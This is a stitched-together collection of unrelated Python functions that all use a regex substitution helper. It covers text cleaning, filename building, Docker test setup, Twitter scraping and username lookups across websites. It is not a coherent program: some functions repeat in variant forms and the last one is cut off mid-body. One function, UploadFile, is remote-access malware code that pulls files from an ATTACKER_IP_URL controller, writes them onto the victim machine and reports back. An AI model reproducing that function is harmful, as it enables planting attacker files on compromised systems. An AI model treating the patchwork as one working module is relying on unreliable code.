def _parse(self, string):
    """
    Parses the given string and stores all information in the instance

    :param string: MTS config-like multi-line string containing the MO definition
    :type string: str|unicode
    """
    # Get MO tag, e.g. [SIM VFB]
    try:
        self._tag = match(r'\[(.+)\]\s*\n', string).group(1)
    except AttributeError:
        raise MtsSectionError("The given string to be parsed does not specify a correct tag for the section.")
    # Get the body: drop the tag line and join lines continued with a backslash
    body = resub(r'\\\s*\n\s*', '', resub(r'.+\]\s*\n', '', string))
    # Strip surrounding double quotes from a value
    sub = lambda value: resub(r'^"', '', resub(r'"$', '', value))
    # Get parameters from within the body
    params_list = split(r'\s*\n\s*', body)
    for param in params_list:
        # Skip empty lines
        if not match(r'\s*$', param):
            var, values = match(r'^(.+?)=(.+)$', param).groups()
            # Split values into a list
            values_list = split(r',\s*', values)
            # Store the parameter
            self._add_param(var, [sub(i) for i in values_list])
def fetch_url(queue, site, options):
    if options.output != "json":
        LOG.info("[Checking] " + get_fld(site["url"]))
    timeout = site["timeout"] if site["timeout"] != 0 else 10
    implicit = site["implicit"] if site["implicit"] != 0 else 5
    detections_count = 0
    # `req` is expected to hold the request context at module level
    source = get(site["url"].replace("{username}", req["body"]["string"]),
                 timeout=(implicit, timeout)).text
    text_only = "unavailable"
    title = "unavailable"
    temp_profile = {
        "found": 0,
        "link": "",
        "rate": "",
        "title": "",
        "text": ""
    }
    for detection in site["detections"]:
        temp_found = "false"
        if detection["type"] == "normal" and source != "" and detection["return"] == "true":
            detections_count += 1
            if detection["string"].replace("{username}", req["body"]["string"]).lower() in source.lower():
                temp_found = "true"
            if detection["return"] == temp_found:
                temp_profile['found'] += 1
    if temp_profile["found"] > 0 and detections_count != 0:
        with ignore_excpetion():
            soup = BeautifulSoup(source, 'html.parser')
            [tag.extract() for tag in soup(['head', 'title', 'style', 'script', '[document]'])]
            temp_profile["text"] = soup.getText()
            temp_profile["text"] = resub(r"\s\s+", " ", temp_profile["text"])
            temp_profile["text"] = temp_profile["text"].replace("\n", "").replace("\t", "").replace("\r", "").strip()
        with ignore_excpetion():
            temp_profile["title"] = BeautifulSoup(source, 'html.parser').title.string
            temp_profile["title"] = resub(r"\s\s+", " ", temp_profile["title"])
            temp_profile["title"] = temp_profile["title"].replace("\n", "").replace("\t", "").replace("\r", "").strip()
        if temp_profile["text"] == "":
            temp_profile["text"] = "unavailable"
        if temp_profile["title"] == "":
            temp_profile["title"] = "unavailable"
        temp_profile["rate"] = "%" + str(round(((temp_profile["found"] / detections_count) * 100), 2))
        temp_profile["link"] = site["url"].replace("{username}", req["body"]["string"])
        copy_temp_profile = temp_profile.copy()
        queue.put([copy_temp_profile])
    else:
        queue.put(None)
def IsValidTitle(txt,
                 expresion=r"[^a-zA-Z\s]|pdf|read|more|download|back|click"
                           r"|pages?|view|continue|reading|format|opens?|window|new"
                           r"|media|release|size|read|full|story"
                           r"|january|february|march|april|may|june|july|august|september"
                           r"|october|november|december|jan|feb|mar|apr|jun|jul"
                           r"|aug|sep|oct|nov|dec"):
    txt = resub(expresion, '', txt.lower())
    txt = resub(" +", ' ', txt)
    if len(txt.split()) < 2:
        return False
    return True
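# A minimal usage sketch (hypothetical titles), assuming `from re import sub as resub`:
# boilerplate link text is rejected, while a real headline passes.
assert IsValidTitle("Read more") is False  # "read" and "more" are both stripped
assert IsValidTitle("Quarterly earnings exceeded forecasts") is True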
def splice_convert(sequence, introns):
    from re import sub as resub
    # Remove each intron from the sequence, leaving only exons
    for intron in introns:
        exon = resub(intron, '', sequence)
        sequence = exon
    # Transcribe DNA to RNA
    exon2 = resub('T', 'U', exon)
    # Trim everything before the first start codon, if one is present
    # (find() returns -1 when AUG is absent, so test >= 0)
    start_ind = exon2.find('AUG')
    if start_ind >= 0:
        ex_out = exon2[start_ind:]
    else:
        ex_out = exon2
        print("didn't find start codon")
    return ex_out
def write_new_ld_file(clusters, oldpath, newpath, threshold=1, **kwargs):
    '''
    clusters is created by get_new_segs above
    oldpath and newpath are the locations of LearningData.txt files, old and new
    threshold defaults to 1 (inseparability measure)
    bigram clusters are sorted by their inseparability value; thus, if something
    that eventually becomes a trigram or tetragram has two-way parts in the
    current inseparability table, the bigram that is higher on the list will be
    replaced first.
    '''
    clustlist = sorted([x for x in clusters if clusters[x] >= threshold],
                       key=clusters.get, reverse=True)
    with open(oldpath, 'r', encoding='utf-8') as f:
        with open(newpath, 'w', encoding='utf-8') as out:
            for line in f:
                word = line.strip()
                if '\t' in line:
                    word = line.split('\t')[0]
                    rest = line.split('\t')[1:]
                for clust in clustlist:
                    x = r'(^|\s)' + clust + r'(\s|$)'
                    y = r'\1' + ''.join(clust.split(" ")) + r'\2'
                    word = resub(x, y, word)
                if '\t' in line:
                    # the last element of rest keeps its trailing newline
                    out.write(word + '\t' + '\t'.join(rest))
                else:
                    out.write(word + '\n')
    msg.env_render(
        message=f"\n\nWrote modified learning data to {newpath.split('simulation')[1]}",
        **kwargs)
def __init__(self, name, test_definition):
    self.name = name
    test_definition = deep_merge(default_config, test_definition)
    # quick shortcuts
    self.test_env = test_definition['environment']
    self.test_meta = test_definition['meta']
    self.test_commands = test_definition.get('test_commands', [])
    # take care of commands ...
    self.test_commands = _build_exec_array(self.test_commands)
    self.test_meta['test_before'] = \
        _build_exec_array(self.test_meta.get('test_before', None))
    self.test_meta['test_after'] = \
        _build_exec_array(self.test_meta.get('test_after', None))
    # okay.
    # let's keep all file references relative to the configuration
    # file. easy to remember.
    configfilepath = realpath(dirname(self.test_meta.get('_configfile', './dummy')))
    # self.TEMPLATE / .TEMPLATE_NAME
    tmp = self.test_meta['docker_compose_template']
    if not isabs(tmp):
        tmp = realpath(join(configfilepath, tmp))
    self.template = tmp
    self.template_name = basename(self.template)
    # self.BASEDIR
    tmp = self.test_meta.get('test_basedir', configfilepath)
    if not isabs(tmp):
        tmp = realpath(join(configfilepath, tmp))
    self.base_dir = tmp
    # self.SANITIZED_NAME, .TEST_DIR
    self.sanitized_name = resub("[^a-zA-Z0-9_]", "-", self.name)
    self.test_dir = dbg_tr_get_testdir(self.base_dir, self.sanitized_name)
    # extend SELF.TEST_ENV with TEST_DIR
    self.test_env['test_dir'] = self.test_dir
    # create SELF.COMMANDLINE
    self.commandline = copy.copy(default_commandline_start)
    for param in self.test_meta['docker_compose_params']:
        self.commandline.append(param)
    for key, val in self.test_env.items():
        self.commandline.append("-e")
        self.commandline.append("%s=%s" % (key, val))
    self.commandline.append("--rm")
    self.commandline.extend(copy.copy(default_commandline_end))
    self.commandline.append(self.test_meta['test_service'])
    # create .STATE, .RESULT, .EXCEPTION, .REASON
    self.state = self.NOTRUN
    self.results = []
    self.exception = None
    self.reason = None
    # log setup
    # NO LOGGING BEFORE HERE
    log_filename = join(self.base_dir, basename(self.test_dir)) + ".log"
    self.log = get_logger("t-%s" % self.name, filename=log_filename)
    # some debug output
    self.log.info("base commandline '%s'" % " ".join(self.commandline))
    self.log.debug("test directory '%s'" % self.test_dir)
    self.log.debug("template path '%s'" % self.template)
    for key, val in self.test_env.items():
        self.log.debug("env %s=%s" % (key, val))
def simplify_string(text):
    """Simplify a string to remove special characters, double spaces
    and use lower case.

    Parameters
    ----------
    text: str
        string to clean

    Returns
    -------
    str

    Examples
    --------
    >>> text = ' (S . cerevisiáe )'
    >>> simplify_string(text)
    's cerevisiae'
    """
    text = text.lower()
    text = ' '.join([t for t in text.split()])
    text = unidecode(text)
    text = resub(r"[^a-zA-Z0-9]+", ' ', text)
    text = ' '.join([t for t in text.split()])  # paranoia
    return text
def cleanTags(string):
    """Remove all html tags from the string.

    >>> cleanTags("<html><head><title>Hello</title><body>Test</body></html>")
    'HelloTest'

    @type string: string
    @param string: the string to clean
    @rtype: string
    @return: the cleaned up string
    """
    # http://lxml.de/api/lxml.html.clean.Cleaner-class.html
    htmlCleaned = Cleaner(allow_tags=[''],
                          remove_unknown_tags=False,
                          style=True).clean_html(string or u"dummy")
    nice = htmlCleaned[5:-6] if htmlCleaned.startswith("<div>") else htmlCleaned
    return resub(r"\s\s+", " ", resub(r"\s\s+", " ", nice)).strip()
def __init__(self, name, compose_file, **kwargs):
    self.name = "{}".format(name if name else basename(compose_file))
    self.sanitized_name = "intmaniac{}".format(
        resub("[^a-z0-9]", "",
              self.name.lower() + basename(compose_file).lower()))
    self.template = compose_file
    self.compose_wrapper = Compose(compose_file, self.sanitized_name,
                                   run_kwargs={'throw': True})
    # extract "top level" parameters
    self.test_env = kwargs.pop('environment', {})
    self.test_image = kwargs.pop('image')
    self.test_linked_services = kwargs.pop('links')
    self.test_commands = _build_exec_array(kwargs.pop('commands', []))
    # save the rest
    self.meta = kwargs
    # state information
    self.test_state = self.NOTRUN
    self.test_results = []
    self.exception = None
    self.reason = None
    # run information - this can only be set after the env is running
    self.cleanup_test_containers = []
    self.run_containers = None
    # log setup
    self.log = get_logger("t-%s" % self.name)
    # some debug output
    self.log.debug("using template '%s'" % self.template)
    for key, val in self.test_env.items():
        self.log.debug("env %s=%s" % (key, val))
def index():
    if request.method == 'POST':
        # Create board details
        boardName = resub(r'[^-\w ]', '', request.form['boardName'])
        singleTokenBoardName = boardName.lower().replace(' ', '-')
        boardId = hashlib.sha1(boardName + datetime.now().__str__()).hexdigest()
        # Add board to database
        mongo.db.boards.insert_one({
            'boardId': boardId,
            'boardName': boardName,
            'singleTokenBoardName': singleTokenBoardName,
            'maxNid': 0,
            'notes': {}
        })
        # # Send email to creator
        # send_email(request.form['email'],
        #            'Link for the scrumboard %s' % boardName,
        #            creator_message % (boardName, singleTokenBoardName, boardId))
        # Redirect user to their new board
        return redirect('/%s/%s' % (singleTokenBoardName, boardId))
    # Render start page on GET
    return render_template('start.j2')
def sniff_dims(x):
    pattern = r"\#+dims\="
    if rematch(pattern, x):
        y = resub(pattern, "", x)
        dims = list(map(int, y.split(",")))
        return dims
    else:
        return None
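# Hedged usage sketch, assuming `from re import match as rematch, sub as resub`:
# a header such as "#dims=3,4,5" yields its integer dimensions, anything else None.
assert sniff_dims("#dims=3,4,5") == [3, 4, 5]
assert sniff_dims("data") is None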
def FindPublishDate(dstr):
    for line in dstr[:300].split('\n\r\t'):
        line = resub(r"\W+", ' ', line).strip()
        pdate = ParseDateStr(line)
        if pdate:
            return pdate
    return ''
def create_replies_with_emojies(id, url):
    replies = list()
    try:
        uclient = ureq(url)
        tweet_html = uclient.read()
        uclient.close()
        tweet_soup = soup(tweet_html, 'html.parser')
        containers = tweet_soup.find_all('div', {'class': 'js-tweet-text-container'})
        if len(containers) > 1:
            record = False
            for container in containers:
                if record:
                    reply = container.p.text.strip()
                    reply = reply.replace('\n', ' ')
                    reply = reply.replace('\r', '')
                    reply = resub(r'https?:\/\/[a-zA-Z0-9@:%._\+~#=\/]*[ ]*', ' ', reply)
                    emojis_used = ''
                    if not reply.strip():
                        continue
                    emojis = container.find_all('img', {'class': 'Emoji Emoji--forText'})
                    for emoji in emojis:
                        emojis_used += " " + emoji['alt']
                    footer = container.parent.find_all('div', {'class': 'stream-item-footer'})[0]
                    retweet_count = footer.find_all('div', {'class': 'ProfileTweet-action--retweet'})[0].find_all(
                        'span', {'class': 'ProfileTweet-actionCountForPresentation'})[0].text.strip()
                    liked_count = footer.find_all('div', {'class': 'ProfileTweet-action--favorite'})[0].find_all(
                        'span', {'class': 'ProfileTweet-actionCountForPresentation'})[0].text.strip()
                    if not retweet_count:
                        retweet_count = 0
                    if not liked_count:
                        liked_count = 0
                    reply = reply.replace(',', ' ')
                    reply_data = [
                        str(id),
                        str(reply),
                        emojis_used,
                        str(retweet_count),
                        str(liked_count)
                    ]
                    replies.append(reply_data)
                record = True
    except:
        t1, v1, trace = exc_info()
        print(t1)
        print(v1)
        print(trace)
        print('error occurred with: ', url)
        replies.clear()
    return replies
def 英文字母_句子():
    global 结果串
    读文件到列表(数据文件名)
    for 句子 in 数据列:
        s = resub(r'[^\w]', '', 句子)  # replace with the empty string
        s = "--".join([i for i in s])
        结果串 = 结果串 + s + '\n'
    将数据写入文件(结果串, 结果文件名)
    return True
def 英文文本():
    global 结果串
    读文件到列表(数据文件名)
    for 句子 in 数据列:
        s = resub(r'[^\w\s]', ' ', 句子)  # replace with a space
        s = "--".join(s.split())
        结果串 = 结果串 + s + '\n'
    将数据写入文件(结果串, 结果文件名)
    return True
def _write_system(self, system, inputf='input', config=None):
    from re import sub as resub
    if not config:
        config = self._config
    dirname = self._dirname
    filename = dirname + '/' + inputf

    polynomials = [p.factor() for p in system.polynomials]
    variables = system.variables
    parameters = system.parameters
    homvar = system.homvar
    num_polys = system.shape[0]

    options = config.keys()

    str_poly = [str(p) for p in polynomials]
    str_poly = [resub(string=p, pattern=r'\*\*', repl='^') for p in str_poly]
    str_vars = [str(v) for v in variables]
    str_pars = [str(p) for p in parameters]

    poly_names = ['f{0}'.format(i + 1) for i in range(num_polys)]
    polys_named = zip(poly_names, str_poly)

    poly_list = ','.join([f for f in poly_names])
    vars_list = ','.join([v for v in str_vars])
    pars_list = ','.join([p for p in str_pars])

    fh = open(filename, 'w')

    # write the CONFIG section
    print('CONFIG', file=fh)
    for option in options:
        print('{0}:{1};'.format(option, config[option]), file=fh)
    print('END', file=fh)

    # write the INPUT section
    print('INPUT', file=fh)
    if parameters:
        print('parameter {0};'.format(pars_list), file=fh)
    if homvar:
        print('hom_variable_group {0};'.format(vars_list), file=fh)
    else:
        print('variable_group {0};'.format(vars_list), file=fh)
    print('function {0};'.format(poly_list), file=fh)

    for p in polys_named:
        # p is a key-value pair, e.g., ('f1', 'x^2 - 1')
        print('{0} = {1};'.format(p[0], p[1]), file=fh)
    print('END', file=fh)

    # finish up
    fh.close()
    return filename
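# Hedged sketch of the Bertini-style input file the writer above produces, for a
# hypothetical system [x**2 - 1] with variable group (x,), no parameters, no
# homogeneous variable, and config {'TRACKTYPE': 1}:
#
#   CONFIG
#   TRACKTYPE:1;
#   END
#   INPUT
#   variable_group x;
#   function f1;
#   f1 = x^2 - 1;
#   END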
def 英文字母_单词():
    global 结果串
    读文件到列表(数据文件名)
    for 句子 in 数据列:
        s = resub(r'[^\w\s]', ' ', 句子)
        for i in s.split():
            tmp = "--".join([x for x in i])
            结果串 = 结果串 + tmp + '\n'
    将数据写入文件(结果串, 结果文件名)
    return True
def filter_file(self, connexion, mo):
    # extract the position of the matching pattern, then extract the
    # conversion string from the file conversion sequence
    groupdict = mo.groupdict()
    for group in groupdict:
        filename = groupdict[group]
        if not filename:
            continue
        filepattern = self.filepatterns[group]
        return resub(r'\{(\w+)\}', connexion._dynreplace, filepattern)
    raise TftpError(TftpError.NOT_DEF,
                    'Internal error, file matching pattern issue')
def replacing(what_to_replace: str, for_what: str, full_string: str) -> str:
    try:
        upper_list = [
            True if letter.isupper() else False
            for letter in refindall(what_to_replace, full_string, flags=reIGNORECASE)[0]
        ]
    except IndexError:
        return "False"
    if all(upper_list):
        return resub(what_to_replace, for_what.upper(), full_string, flags=reIGNORECASE)
    replaced_word = ''.join(
        letter.upper() if is_upper else letter.lower()
        for letter, is_upper in zip_longest(for_what, upper_list, fillvalue=False))
    return resub(what_to_replace, replaced_word, full_string, flags=reIGNORECASE)
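# Hedged usage sketch, assuming `from re import sub as resub, findall as refindall,
# IGNORECASE as reIGNORECASE` and `from itertools import zip_longest`: the
# replacement mirrors the casing of the first matched occurrence.
assert replacing("cat", "dog", "My CAT is here") == "My DOG is here"
assert replacing("cat", "dog", "My Cat is here") == "My Dog is here"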
def startscrapping(self, id, url):
    self.replies_found = False
    with open(self.replies_title, "a", encoding="utf-8") as replies:
        try:
            uclient = ureq(url)
            tweet_html = uclient.read()
            uclient.close()
            tweet_soup = soup(tweet_html, 'html.parser')
            containers = tweet_soup.find_all('div', {'class': 'js-tweet-text-container'})
            if len(containers) > 1:
                record = False
                for container in containers:
                    if record:
                        reply = container.p.text.strip()
                        reply = reply.replace('\n', ' ')
                        reply = reply.replace('\r', '')
                        reply = resub(r'https?:\/\/[a-zA-Z0-9@:%._\+~#=\/]*[ ]*', ' ', reply)
                        if not reply.strip():
                            continue
                        emoji_used = ''
                        emojis = container.find_all('img', {'class': 'Emoji Emoji--forText'})
                        for emoji in emojis:
                            emoji_used += emoji['alt'] + ' '
                        footer = container.parent.find_all('div', {'class': 'stream-item-footer'})[0]
                        retweet_count = footer.find_all('div', {'class': 'ProfileTweet-action--retweet'})[0].find_all(
                            'span', {'class': 'ProfileTweet-actionCountForPresentation'})[0].text.strip()
                        liked_count = footer.find_all('div', {'class': 'ProfileTweet-action--favorite'})[0].find_all(
                            'span', {'class': 'ProfileTweet-actionCountForPresentation'})[0].text.strip()
                        if not retweet_count:
                            retweet_count = 0
                        if not liked_count:
                            liked_count = 0
                        reply = reply.replace(',', ' ')
                        reply_data = str(id) + ',' + str(reply) + ',' + emoji_used + ',' + \
                            str(retweet_count) + ',' + str(liked_count) + '\n'
                        replies.write(reply_data)
                        self.replies_found = True
                    record = True
        except:
            print('error occurred with: ', url)
            self.replies_found = False

# scrap = Scrapper('https://t.co/36UkqQikKc', '932115407783174145')
# scrap.startscrapping()
def gen_filename(collection_name, format_part, date_string, extension):
    """
    Creates a filename based on various properties of a Poll Request and Content Block

    :param collection_name: The collection name
    :param format_part: The format part (e.g., '_STIX_10_')
    :param date_string: A datestring
    :param extension: The file extension to use
    :return: A string containing the generated filename
    """
    filename = (collection_name.lstrip(".") +
                format_part +
                resub(r"[^a-zA-Z0-9]", "_", date_string) +
                extension).translate(None, '/\\:*?"<>|')
    return filename
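# Hedged usage sketch (Python 2, since str.translate(None, deletechars) is the
# Python 2 form): non-alphanumerics in the datestring become underscores, and
# filesystem-unsafe characters are deleted.
assert gen_filename("default", "_STIX111_", "t2014-10-31T08:00:00", ".xml") == \
    "default_STIX111_t2014_10_31T08_00_00.xml"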
def clean_data(my_string):
    '''
    clean_data cleans the my_string argument. It removes non-printable
    characters and specific csv characters, and strips empty characters from
    the beginning and end. It also removes SPLITTER, a specific string used
    for objects and relations.
    '''
    rexes = ['^ *', ' *$', SPLITTER]
    char_to_remove = ["'", '"', ',']
    clean_s = ''
    for char in my_string:
        if char in printable and char not in char_to_remove:
            clean_s += char
    for regex in rexes:
        clean_s = resub(regex, '', clean_s)
    return clean_s
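# Hedged usage sketch, assuming SPLITTER == "__", `from string import printable`
# and `from re import sub as resub`:
#   clean_data('  "hello", world__  ')  ->  'hello world'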
def ParseDateStr(dstr):
    if len(dstr) == 0:
        return ''
    dstr = ' ' + dstr.lower() + ' '
    # Strip ordinal suffixes (1st, 2nd, 3rd, 4th, ...)
    dstr = resub(r'[\W\d](th|st|nd|rd)\W', '', dstr).strip()
    try:
        dobjs = extract_dates(dstr, return_precision=True, debug=False)
        for o in dobjs:
            if o[1] == 'day':
                dobj = o[0].replace(tzinfo=None)
                if dobj <= cdate:
                    return dobj
    except:
        return ''
    return ''
def get_files_prefixes(fs_path="./input", suffix=".csv$"):
    '''
    get_files_prefixes searches the path and returns all files that contain
    objects and relations for the graph
    '''
    files_prefix = {}
    for _, _, files in walk(fs_path):
        for name in files:
            base_name = resub(suffix, '', name)
            name_parts = base_name.split(SPLITTER)
            if name_parts[0] == OBJECT_FILE_PREFIX or name_parts[0] == RELATIONS_FILE_PREFIX:
                if name_parts[0] not in files_prefix.keys():
                    files_prefix[name_parts[0]] = set()
                files_prefix[name_parts[0]].add(name)
    return files_prefix
def UploadFile(command):
    upload = ""
    fileContentPath = ""
    try:
        upload, fileContentPath = command.split('::')
    except Exception as e:
        httpReq(ATTACKER_IP_URL,
                data="file=" + quote_plus('\n [ERROR] Invalid command syntax.\n'))
        return
    try:
        fileBytes = httpReq(ATTACKER_IP_URL + '/uploadRequest',
                            data='file=' + quote_plus(fileContentPath.replace('"', '')),
                            returnBytes=True)
        fName = httpReq(ATTACKER_IP_URL + '/uploadRequestFileName',
                        data='file=' + quote_plus(fileContentPath.replace('"', ''))).encode()
        # Strip anything that is not valid base64, restore padding, then decode
        altchars = b'+/'
        fName = resub(rb'[^a-zA-Z0-9%s]+' % altchars, b'', fName)
        missing_padding = len(fName) % 4
        if missing_padding:
            fName += b'=' * (4 - missing_padding)
        fName = b64decode(fName, altchars)
        fName = fName.decode()
        try:
            with open(fName, 'wb') as f:
                f.write(fileBytes)
            httpReq(ATTACKER_IP_URL,
                    data="file=" + quote_plus('\n [INFO] Upload successful.\n'))
        except Exception as e:
            httpReq(ATTACKER_IP_URL,
                    data="file=" + quote_plus('\n [ERROR] An error occurred when trying to upload.\n'))
            pass
    except Exception as e:
        httpReq(ATTACKER_IP_URL, data="file=" + quote_plus(str(e.args)))
def do_comment(request, dailyphoto_id):
    dp_obj = get_object_or_404(DailyPhoto, id=dailyphoto_id)
    comment = request.POST.get('do_comment', '')
    comment = comment.strip()
    # Save the comment in DB.
    print "Comment Text: ", comment
    list_of_users_in_comment = [resub(r'\[|\]', r'', name)
                                for name in findall(r'\[[a-z0-9]+\]', comment)]
    for nuser in list_of_users_in_comment:
        print nuser
    if comment:
        Comments.objects.create(user=request.user,
                                dailyphoto=get_object_or_404(DailyPhoto, id=dailyphoto_id),
                                comment=comment,
                                )
        redis_obj = StrictRedis(db=9)
        redis_obj.publish("notifications:%s" % request.user.username, 1)
    return HttpResponseRedirect(
        reverse('users.views.browse_daily_photo_single',
                args=(str(dp_obj.user.username), dp_obj.key)))
def handle_response(self, response, args):
    super(PollClient11Script, self).handle_response(response, args)
    if response.message_type == tm11.MSG_POLL_RESPONSE:
        if response.more:
            print "This response has More=True, to request additional parts, use the following command:"
            print "  fulfillment_client --collection %s --result-id %s --result-part-number %s\r\n" % \
                  (response.collection_name, response.result_id, response.result_part_number + 1)
        for cb in response.content_blocks:
            if cb.content_binding.binding_id == t.CB_STIX_XML_10:
                format = '_STIX10_'
                ext = '.xml'
            elif cb.content_binding.binding_id == t.CB_STIX_XML_101:
                format = '_STIX101_'
                ext = '.xml'
            elif cb.content_binding.binding_id == t.CB_STIX_XML_11:
                format = '_STIX11_'
                ext = '.xml'
            elif cb.content_binding.binding_id == t.CB_STIX_XML_111:
                format = '_STIX111_'
                ext = '.xml'
            else:  # Format and extension are unknown
                format = ''
                ext = ''
            if cb.timestamp_label:
                date_string = 't' + cb.timestamp_label.isoformat()
            else:
                date_string = 's' + datetime.datetime.now().isoformat()
            filename = (response.collection_name.lstrip(".") +
                        format +
                        resub(r"[^a-zA-Z0-9]", "_", date_string) +
                        ext).translate(None, '/\\:*?"<>|')
            filename = os.path.join(args.dest_dir, filename)
            f = open(filename, 'w')
            f.write(cb.content)
            f.flush()
            f.close()
            print "Wrote Content Block to %s" % filename
def image_resize(image_path, new_size, maintain_ratio=False):
    save_dir = path.dirname(image_path)
    new_filename = '%s_%s' % (path.basename(image_path), new_size)
    resize_command = ['convert', "%s" % image_path]
    if not maintain_ratio:
        comm_args = '-resize "%s^" -gravity center -extent %s "%s/%s"' \
                    % (new_size, new_size, save_dir, new_filename)
    else:
        # Read the current dimensions and scale the height to keep the aspect ratio
        image_size = check_output(['identify', "%s" % image_path])
        image_size = resub(r'.* ([0-9]+x[0-9]+) .*\n', r'\1', image_size)
        old_x, old_y = image_size.split('x')
        new_x, new_y = new_size.split('x')
        new_y = int((float(old_y) / float(old_x)) * float(new_x))
        new_size = "%sx%d" % (new_x, new_y)
        new_filename = '%s_%s' % (path.basename(image_path), new_x)
        comm_args = '-resize %s^ -gravity center -extent %s "%s/%s"' \
                    % (new_size, new_size, save_dir, new_filename)
    resize_command.extend(shlex_split(comm_args))
    call(resize_command)
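# Hedged usage sketch (assumes ImageMagick's `convert` and `identify` binaries on
# PATH and a hypothetical input file): crop-to-fit at 200x200, or scale the height
# proportionally to a width of 200.
#   image_resize('/tmp/photo.jpg', '200x200')
#   image_resize('/tmp/photo.jpg', '200x200', maintain_ratio=True)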
def build_mac_acl(cls, entry: str) -> Tuple[int, int]:
    parts = entry.split('/', 1)
    values = []
    bitcount = cls.ACCESS_LOCAL['mac']
    maxval = (1 << bitcount) - 1
    for mask, part in enumerate(parts):
        try:
            if mask:
                # Second component is a prefix length; build the bitmask
                value = maxval & ~((1 << int(part)) - 1)
            else:
                # First component is the MAC itself; drop separators and left-align
                part = resub('[-:]', '', part)
                value = int(part, 16)
                value <<= bitcount - len(part) * 4
            if not 0 <= value <= maxval:
                raise ValueError()
            values.append(value)
        except Exception:
            raise ValueError('Invalid ACL value: %s' % entry)
    if len(values) < 2:
        values.append(maxval)
    return tuple(values)
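# Hedged usage sketch, assuming cls.ACCESS_LOCAL['mac'] == 48 (full MAC width):
# a bare address gets an all-ones mask, while "/24" keeps only the OUI prefix.
#   build_mac_acl(cls, "aa:bb:cc:dd:ee:ff")  ->  (0xaabbccddeeff, 0xffffffffffff)
#   build_mac_acl(cls, "aa:bb:cc/24")        ->  (0xaabbcc000000, 0xffffff000000)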
def _clean_text(self, text_series):
    """
    Cleans a column of text. Removes all special characters, websites,
    mentions etc.

    Parameters
    ----------
    text_series: Pandas.Series

    Returns
    -------
    Pandas.Series
        Cleaned text
    """
    from re import sub as resub
    text_series = text_series.apply(
        lambda x: resub(r"[^A-Za-z0-9 ]+|(\w+:\/\/\S+)|htt", " ", x)
    ).str.strip().str.lower()
    return text_series
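# Hedged usage sketch with pandas (`cleaner` is a hypothetical instance carrying
# this method): URLs, punctuation and mention sigils are blanked out, then each
# entry is trimmed and lowercased; interior runs of spaces may remain.
#   import pandas as pd
#   cleaner._clean_text(pd.Series(["Check https://t.co/abc out!!"]))
#   # -> pd.Series(["check   out"])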
def __init__(self, name, compose_file, **kwargs):
    self.name = "{}".format(name if name else basename(compose_file))
    self.sanitized_name = "intmaniac{}".format(
        resub("[^a-z0-9]", "",
              self.name.lower() + basename(compose_file).lower()))
    self.template = compose_file
    self.compose_wrapper = Compose(compose_file, self.sanitized_name,
                                   run_kwargs={'throw': True})
    # extract "top level" parameters
    self.test_env = kwargs.pop('environment', {})
    self.test_image = kwargs.pop('image')
    self.test_linked_services = kwargs.pop('links')
    self.test_commands = _build_exec_array(kwargs.pop('commands', []))
    # meta_information
    self.pull = kwargs.pop('pull', True)
    self.pre = kwargs.pop('pre', None)
    self.post = kwargs.pop('post', None)
    self.allow_failure = kwargs.pop('allow_failure', False)
    self.volumes = self.format_volume_mapping(kwargs.pop('volumes', []))
    # save the rest (run-arguments for docker.container.create())
    self.meta = kwargs
    # state information
    self.test_state = self.NOTRUN
    self.test_results = []
    self.exception = None
    self.reason = None
    # run information - this can only be set after the env is running
    self.cleanup_test_containers = []
    self.run_containers = None
    # log setup
    self.log = get_logger("t-%s" % self.name)
    # some debug output
    self.log.debug("using template '%s'" % self.template)
    for key, val in self.test_env.items():
        self.log.debug("env %s=%s" % (key, val))
def fetch_url(site, username, options):
    LOG.info("[Checking] " + get_fld(site["url"]))
    timeout = site["timeout"] if site["timeout"] != 0 else 10
    implicit = site["implicit"] if site["implicit"] != 0 else 5
    detections_count = 0
    source = ""
    with suppress(Exception):
        source = get(site["url"].replace("{username}", username),
                     timeout=(implicit, timeout)).text
    text_only = "unavailable"
    title = "unavailable"
    detection_level = {
        "extreme": {
            "fast": "normal",
            "slow": "normal,advanced,ocr",
            "detections": "true",
            "count": 1,
            "found": 2
        },
        "high": {
            "fast": "normal",
            "slow": "normal,advanced,ocr",
            "detections": "true,false",
            "count": 2,
            "found": 1
        },
        "current": "high"
    }
    temp_profile = {
        "found": 0,
        "image": "",
        "link": "",
        "rate": "",
        "title": "",
        "language": "",
        "text": "",
        "type": "",
        "good": "",
        "method": ""
    }
    for detection in site["detections"]:
        temp_found = "false"
        if detection['type'] in detection_level[detection_level['current']]['fast'] and source != "":
            detections_count += 1
            if detection["string"].replace("{username}", username).lower() in source.lower():
                temp_found = "true"
            if detection["return"] == temp_found:
                temp_profile['found'] += 1
    if temp_profile['found'] >= detection_level[detection_level['current']]['found'] and \
            detections_count >= detection_level[detection_level['current']]['count']:
        temp_profile['good'] = "true"
    with suppress(Exception):
        soup = BeautifulSoup(source, 'html.parser')
        [tag.extract() for tag in soup(['head', 'title', 'style', 'script', '[document]'])]
        temp_profile["text"] = soup.getText()
        temp_profile["text"] = resub(r"\s\s+", " ", temp_profile["text"])
        temp_profile["text"] = temp_profile["text"].replace("\n", "").replace("\t", "").replace("\r", "").strip()
    with suppress(Exception):
        temp_profile["language"] = get_language_by_parsing(source)
        if temp_profile["language"] == "unavailable":
            temp_profile["language"] = get_language_by_guessing(temp_profile["text"])
    with suppress(Exception):
        temp_profile["title"] = BeautifulSoup(source, 'html.parser').title.string
        temp_profile["title"] = resub(r"\s\s+", " ", temp_profile["title"])
        temp_profile["title"] = temp_profile["title"].replace("\n", "").replace("\t", "").replace("\r", "").strip()
    if temp_profile["text"] == "":
        temp_profile["text"] = "unavailable"
    if temp_profile["title"] == "":
        temp_profile["title"] = "unavailable"
    with suppress(Exception):
        temp_profile["rate"] = "%" + str(round(((temp_profile["found"] / detections_count) * 100), 2))
    temp_profile["link"] = site["url"].replace("{username}", username)
    temp_profile["type"] = site["type"]
    if "FindUserProfilesFast" in options and "GetUserProfilesFast" not in options:
        temp_profile['method'] = "find"
    elif "GetUserProfilesFast" in options and "FindUserProfilesFast" not in options:
        temp_profile['method'] = "get"
    elif "FindUserProfilesFast" in options and "GetUserProfilesFast" in options:
        temp_profile['method'] = "all"
    copy_temp_profile = temp_profile.copy()
    return copy_temp_profile
def stripComment(self, text):
    """
    Regex substitutions for comments; removes comment characters.
    """
    subText = lambda value, regex: resub(regex, '', value)
    for text in ifilter(unicode.strip, text.split('\n')):
        yield reduce(subText, self.commentSubs, text)
def str2tupleunit(_str: str) -> tuple:
    """Convert measurement units from string to tuple"""
    _num = resub(r'([0-9.]+)([ _,]*)([A-Za-z/]+)', r'\1', _str)
    _unit = resub(r'([0-9.]+)([ _,]*)([A-Za-z/]+)', r'\3', _str)
